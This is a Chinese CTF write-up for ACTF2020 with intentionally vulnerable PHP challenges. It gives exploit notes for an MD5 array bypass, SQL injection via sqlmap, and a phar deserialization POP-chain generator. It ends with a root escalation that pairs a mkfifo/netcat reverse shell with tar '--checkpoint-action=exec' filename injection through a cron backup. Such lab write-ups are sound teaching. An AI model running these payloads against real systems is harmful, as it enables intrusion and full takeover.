中南大学联合其他几个大学办的比赛,今天题目开放了,来做了下,质量很高,很多题还无法明确思路,等一手wp
PHP代码审计入门题
<?php
error_reporting(0);
include_once "flag.php";
show_source(__FILE__);
session_start();
if(!isset($_POST['key'])) {
die("not allow!");
}
if($_POST['key'] != $_SESSION['key']) {
die("Wrong key!");
}
if(isset($_GET['username']) && isset($_GET['password'])) {
if($_GET['username'] == $_GET['password']) {
die("Your password can not be your username!");
}
if(md5($_GET['username']) === md5($_GET['password'])) {
echo $flag;
}
}
数组绕过+置空
SQL注入入门题
<?php
include 'config.php';
$id = $_GET['id'];
$sql = "select * from users where id=".$id;
$res = $conn->query($sql);
if($res){
if($res->num_rows > 0) {
while ($row = $res->fetch_assoc()) {
foreach($row as $key=>$value) {
echo $key.": ".$value."<br/>";
}
echo "<br/>";
}
} else {
//echo "This user doesn't exist.<br>";
}
}else{
//echo "Error in query.<br>";
}
$conn->close();
highlight_file(__FILE__);
sqlmap一把梭
SimplePHP
phar反序列化
可以读到源码
<?php
class Show
{
public $source;
public $str;
public function __construct($file)
{
$text= $this->source;
$text = base64_encode(file_get_contents($text));
}
public function __toString()
{
$text= $this->source;
$text = base64_encode(file_get_contents($text));
return $text;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class S6ow
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
return $this->params[$key];
}
public function __call($name, $arguments)
{
if($this->{$name})
$this->{$this->{$name}}($arguments);
}
public function file_get($value)
{
var_dump($this->file);
echo $this->file;
}
}
class Sh0w
{
public $test;
public $str;
public function __construct($name)
{
$this->str = new Show('index.php');
$this->str->source = $this->test;
}
public function __destruct()
{
$this->str->_show();
}
}
审下链子就知道最终用__toString()方法,而他的调用需要有类似echo方法。发现自定义函数file_get有echo
选择Sh0w类下的__destruct()方法可以新建一个show方法
<?php
class Sh0w
{
public $test;
public $str;
}
class S6ow
{
public $file;
public $params;
}
class Show
{
public $str;
public $source;
}
$a = new S6ow();
$b = new Show();
$c = new Sh0w();
$b ->source = '/flag';
$a ->params = array('_show' => 'file_get');
$a ->file = $b;
$c ->str = $a;
$phar = new Phar("1.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"." <?php __HALT_COMPILER(); ?>");
$phar->setMetadata($c);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
up up
www.zip给了个shell,连上后发现需要提权?等一手wp
https://github.com/CSUAuroraLab/ACTF2020
拿到shell后
python -c 'import pty;pty.spawn("/bin/bash")'创建流,方便切换用户交互
根目录:/flag_here的提示内容,flag在/root/下,需要提权。可以登录到用户actf
actf对 /home/actf具有写权限,可以写入sh
查看到/etc/crontab中有一个定时任务/etc/cron.daily/backup
利用此定时任务提权,在/home/actf/目录下执行:
nc -lp 8888 -vv
echo "mkfifo /tmp/jvenbd; nc 127.0.0.1 8888 0</tmp/jvenbd | /bin/sh >/tmp/jvenbd 2>&1; rm /tmp/jvenbd" > shell.sh && chmod +x shell.sh
echo > "--checkpoint-action=exec=sh shell.sh"
echo > "--checkpoint=1"即可得到root用户的shell,拿到flag
